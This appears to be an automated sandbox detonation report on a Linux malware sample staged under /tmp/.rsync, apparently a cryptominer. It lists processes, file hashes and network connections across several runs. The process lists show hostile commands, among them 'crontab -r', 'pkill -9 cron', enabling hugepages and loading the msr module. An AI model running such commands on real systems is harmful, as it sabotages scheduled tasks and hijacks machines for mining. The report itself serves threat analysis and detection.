[/tmp/.rsync/c/lib/32/libresolv-2.23.so]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libresolv-2.23.so

[/tmp/.rsync/c/lib/32/libresolv-2.23.so]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

132s

Command Line

[/tmp/.rsync/a/run]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/run

[/tmp/.rsync/a/run]

/tmp/.rsync/a/stop

[./stop]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

/tmp/.rsync/a/cron

[./cron]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/libresolv.so.2]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libresolv.so.2

[/tmp/.rsync/c/lib/32/libresolv.so.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

129s

Command Line

[/tmp/.rsync/c/lib/32/tsm]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/tsm

[/tmp/.rsync/c/lib/32/tsm]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

debian9-mipsbe-20240611-en

Max time kernel

14s

Command Line

[/tmp/.rsync/a/a]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/.rsync/a/upd /tmp/.rsync/a/upd N/A

Enumerates running processes

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /sbin/sysctl N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/devices/system/node /tmp/.rsync/a/a N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/upd /tmp/.rsync/a/a N/A
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A
File opened for modification /tmp/.rsync/a/dir.dir /tmp/.rsync/a/run N/A
File opened for modification /tmp/.rsync/a/bash.pid /tmp/.rsync/a/run N/A

Processes

/tmp/.rsync/a/a

[/tmp/.rsync/a/a]

/usr/bin/crontab

[crontab -r]

/bin/cat

[cat dir.dir]

/usr/bin/nproc

[nproc]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=1]

/usr/bin/find

[find /sys/devices/system/node/node* -maxdepth 0 -type d]

/sbin/modprobe

[modprobe msr]

/bin/grep

[grep AMD Ryzen]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep Intel]

/bin/cat

[cat /proc/cpuinfo]

/bin/chmod

[chmod u+x upd]

/bin/chmod

[chmod 777 a anacron cron dir.dir run stop upd]

/tmp/.rsync/a/upd

[./upd]

/tmp/.rsync/a/run

[./run]

/tmp/.rsync/a/stop

[./stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/bin/grep

[grep cron]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/usr/bin/awk

[awk {print $1}]

/bin/rm

[rm -rf .proc]

/bin/sleep

[sleep 10]

/bin/cat

[cat dir.dir]

/bin/uname

[uname -m]

Network

N/A

Files

/tmp/.rsync/a/dir.dir

MD5 b3d878adcf4672bbd1f31cffac10c769
SHA1 ce5798837933ece35a7e26a0a3dc06cab19c6275
SHA256 ea5fce19c5fbbbc6c3c36eb9e8e295dfb525e9669aafaf8abe9ddb4e00e345c7
SHA512 019d21a618b3ccc70c0c7ede225cbbb704e2b448048586c44c74c81a747129da9f3f9675f2a29363af320d2684974a1ff00ac608c53de4458aeacd3ed4f9da2c

/tmp/.rsync/a/upd

MD5 a136fbe534c2487d3c89bd6a26847bd0
SHA1 11b9362ba79b67dd5d5baf7cf11e0003f049d6e0
SHA256 419a443ff93475ef3abb6e71e5a94e56aea8b7c1f1c4402b3662425815432d46
SHA512 85047cf9d22037d2581ae41275107b243c0bb3259b57fe46bd3fd04a1abe75a7fdeace8a9eae1fae31349a00183206b40259ab3957db8f4f16a79e67133485e9

/tmp/.rsync/a/bash.pid

MD5 68b329da9893e34099c7d8ad5cb9c940
SHA1 adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512 be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:57

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/.rsync/a/stop]

Signatures

Enumerates running processes

Reads CPU attributes

Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A

Reads runtime system information

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/a/.proc /tmp/.rsync/a/stop N/A

Processes

/tmp/.rsync/a/stop

[/tmp/.rsync/a/stop]

/usr/bin/pkill

[pkill -9 cron]

/usr/bin/killall

[killall -9 cron]

/usr/bin/awk

[awk {print $1}]

/bin/grep

[grep -v grep]

/bin/grep

[grep cron]

/bin/ps

[ps x]

/bin/rm

[rm -rf .proc]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 195.181.164.20:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 195.181.164.16:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:54

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Command Line

[/tmp/.rsync/c/lib/32/libc.so.6]

Signatures

N/A

Processes

/tmp/.rsync/c/lib/32/libc.so.6

[/tmp/.rsync/c/lib/32/libc.so.6]

Network

N/A

Files

N/A